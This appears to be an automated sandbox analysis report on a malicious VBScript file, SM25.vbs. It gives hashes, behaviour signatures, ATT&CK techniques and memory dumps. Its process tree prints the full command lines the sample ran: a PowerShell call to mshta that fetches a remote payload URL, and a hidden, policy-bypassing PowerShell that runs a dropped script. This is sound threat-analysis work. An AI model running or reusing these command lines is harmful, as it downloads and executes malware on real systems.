Overview

overview

8

Static

static

SM25.vbs

windows7_x64

8

SM25.vbs

windows10_x64

8

Analysis

  • max time kernel
    16s
  • max time network
    13s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    08-04-2021 06:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SM25.vbs

  • Size

    996B

  • MD5

    0bafdab6b8c7bfc2867f8a8ff1437c40

  • SHA1

    eb624db807094865eb14504f323301a0fd2cd95e

  • SHA256

    7a74348cfdcf7d37e88f264c0b9a50b5b9cbec188ca02da0bcca6f054a1b183e

  • SHA512

    9f77c88356140e7433ffcbb2ffd40f013dfa3fb962fdf17afcccc26a274b11eb45c778136d9f1c3054a5f437eb238ab081d19f58482efea550bab410838c5e65

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Drops startup file 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SM25.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:1812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\mshta https://pazpus.com/bootstrap/cache/zender.txt
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1992
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" https://pazpus.com/bootstrap/cache/zender.txt
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:1780
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1404
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -command C:\Users\Public\Datax.ps1;
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:816

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

2
T1112

Install Root Certificate

1
T1130

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    adbfb2b6eab3e39e8d8d8340bd1d2bc8

    SHA1

    999ad8179a1b6b8a0d8ac63bcf1d67e81c3cce9f

    SHA256

    e8baab4a374f47829675e71b3228cbf9e8231e7cd1dcf1e8c4ea375761afad74

    SHA512

    f04066056ab39763b5a81cc64e7e3c496caabefe499a478898a68b85b1a300aa494702ed42a264e53a6abb4652adacfbf64d937c23cfa0354356fab39a157990

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    adbfb2b6eab3e39e8d8d8340bd1d2bc8

    SHA1

    999ad8179a1b6b8a0d8ac63bcf1d67e81c3cce9f

    SHA256

    e8baab4a374f47829675e71b3228cbf9e8231e7cd1dcf1e8c4ea375761afad74

    SHA512

    f04066056ab39763b5a81cc64e7e3c496caabefe499a478898a68b85b1a300aa494702ed42a264e53a6abb4652adacfbf64d937c23cfa0354356fab39a157990

    Download Submit
  • \??\PIPE\srvsvc
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    Download Submit
  • memory/108-23-0x000007FEF79D0000-0x000007FEF7C4A000-memory.dmp
    Filesize

    2.5MB

    Download
  • memory/816-41-0x0000000002820000-0x0000000002821000-memory.dmp
    Filesize

    4KB

    Download
  • memory/816-40-0x0000000002810000-0x0000000002811000-memory.dmp
    Filesize

    4KB

    Download
  • memory/816-42-0x000000001AC8A000-0x000000001ACA9000-memory.dmp
    Filesize

    124KB

    Download
  • memory/816-28-0x000000001ABF0000-0x000000001ABF1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/816-25-0x0000000002640000-0x0000000002641000-memory.dmp
    Filesize

    4KB

    Download
  • memory/816-24-0x0000000001F20000-0x0000000001F21000-memory.dmp
    Filesize

    4KB

    Download
  • memory/816-13-0x0000000000000000-mapping.dmp
    Download
  • memory/816-21-0x00000000024F0000-0x00000000024F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/816-16-0x000007FEF53C0000-0x000007FEF5DAC000-memory.dmp
    Filesize

    9.9MB

    Download
  • memory/816-17-0x0000000002420000-0x0000000002421000-memory.dmp
    Filesize

    4KB

    Download
  • memory/816-20-0x000000001AC84000-0x000000001AC86000-memory.dmp
    Filesize

    8KB

    Download
  • memory/816-19-0x000000001AC80000-0x000000001AC82000-memory.dmp
    Filesize

    8KB

    Download
  • memory/816-18-0x000000001AD00000-0x000000001AD01000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1404-51-0x000000001ADB4000-0x000000001ADB6000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1404-49-0x000000001ADB0000-0x000000001ADB2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1404-47-0x000007FEF53C0000-0x000007FEF5DAC000-memory.dmp
    Filesize

    9.9MB

    Download
  • memory/1404-43-0x0000000000000000-mapping.dmp
    Download
  • memory/1780-12-0x0000000000000000-mapping.dmp
    Download
  • memory/1812-2-0x000007FEFBA41000-0x000007FEFBA43000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1812-22-0x0000000002480000-0x0000000002484000-memory.dmp
    Filesize

    16KB

    Download
  • memory/1992-6-0x0000000002260000-0x0000000002261000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-8-0x000000001AD80000-0x000000001AD82000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1992-9-0x00000000023C0000-0x00000000023C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-5-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp
    Filesize

    9.9MB

    Download
  • memory/1992-10-0x000000001AD84000-0x000000001AD86000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1992-3-0x0000000000000000-mapping.dmp
    Download
  • memory/1992-11-0x0000000002470000-0x0000000002471000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-7-0x000000001AE00000-0x000000001AE01000-memory.dmp
    Filesize

    4KB

    Download